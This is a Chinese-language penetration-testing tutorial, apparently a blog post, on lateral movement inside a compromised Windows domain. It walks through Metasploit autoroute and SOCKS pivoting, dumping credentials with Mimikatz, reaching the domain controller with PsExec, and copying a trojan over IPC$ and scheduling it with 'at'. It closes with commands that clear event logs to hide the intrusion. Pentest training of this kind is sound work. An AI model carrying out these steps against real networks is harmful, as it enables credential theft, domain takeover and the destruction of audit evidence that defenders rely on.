【kali渗透测试】内网横向渗透横向移动基础

横向移动

横向移动指在已攻陷目标主机前提下,利用既有的资源尝试获取更多的凭据、域控主机的会话,以达到控制整个内网和拥有最高权限的目的。

横向移动的4种情况:

  • 目标主机最高权限且能获取域控会话
  • 目标主机最高权限但无法连接域控主机
  • 目标主机没有最高权限,但可以通过横向移动获取域控主机会话
  • 目标主机没有最高权限且内网没有横向移动的主机

1. 代理路由

功能:将目标主机流量代理到本地访问,代理路由可以穿透目标主机防火墙

场景:已经获取到域控主机 ip 地址段

  1. 加入网段到当前会话的路由表
bash 复制代码
run autoroute -s 目标主机内网网段
  1. 更改 kali linux 代理配置文件 /etc/proxychains4.conf
bash 复制代码
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4     127.0.0.1 1080       
  1. 运行代理服务
bash 复制代码
use auxiliary/server/socks_proxy
  1. 测试代理路由能否访问内网主机

使用端口扫描模块并配置扫描主机IP地址为域控主机IP地址

bash 复制代码
use auxiliary/scanner/portscan/tcp
set rhost 域控主机ip
run

2. 通过 PsExec 获取域控主机会话

PsExec:可以在远程主机执行命令或程序的工具

  1. 获取目标主机凭据
bash 复制代码
load kiwi
kiwi_cmd sekurlsa:: logonPasswords
  1. 使用 PsExec 工具
    更改RHOSTS为域控主机IP地址、SMBDomain为域名、SMBPass为密码、SMBUser为用户名
bash 复制代码
use exploit/ windows/smb/psexec
exploit

3. 通过 IPC$ 获取域控主机会话

IPC(InternetProcessConnection):共享"命名管道"的资源(1)查看是否开启IPC(Internet Process Connection):共享"命名管道"的资源 (1)查看是否开启 IPC(InternetProcessConnection):共享"命名管道"的资源(1)查看是否开启IPC

bash 复制代码
net view
net use \\DC\c$. #连接域控  IPC$

(2)上传木马到目标主机

(3)复制木马文件到域控主机

bash 复制代码
copy 上传文件地址 \\DC\c$

(3)在域控主机上运行木马

bash 复制代码
net time \\DC # 获取域控主机时间
at \\DC启动时间 域控主机的木马文件路径 # 在启动时间运行

除上述方法外,还可以通过WMIC获取域控主机会话

补充:清除日志

常见日志:登录、审计、应用程序、网络、安全事件

  • 方法一:Metasploit
    会话中输入:
bash 复制代码
clearev
  • 方法二:Mimikatz扩展
bash 复制代码
kiwi_cmd event::clear

总结:系统命令和敏感问题收集目标主机信息 ------> Metasploit框架和Starkiller框架收集域控主机信息 ------> PsExec、IPC$、WMIC等获取域控主机会话 ------> 清楚目标主机和域控主机日志

相关推荐
一名优秀的码农2 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp2 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp2 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人2 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp2 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo0072 天前
渗透测试_漏洞利用
网络安全
啥都想学点2 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ2 天前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏2 天前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk2 天前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全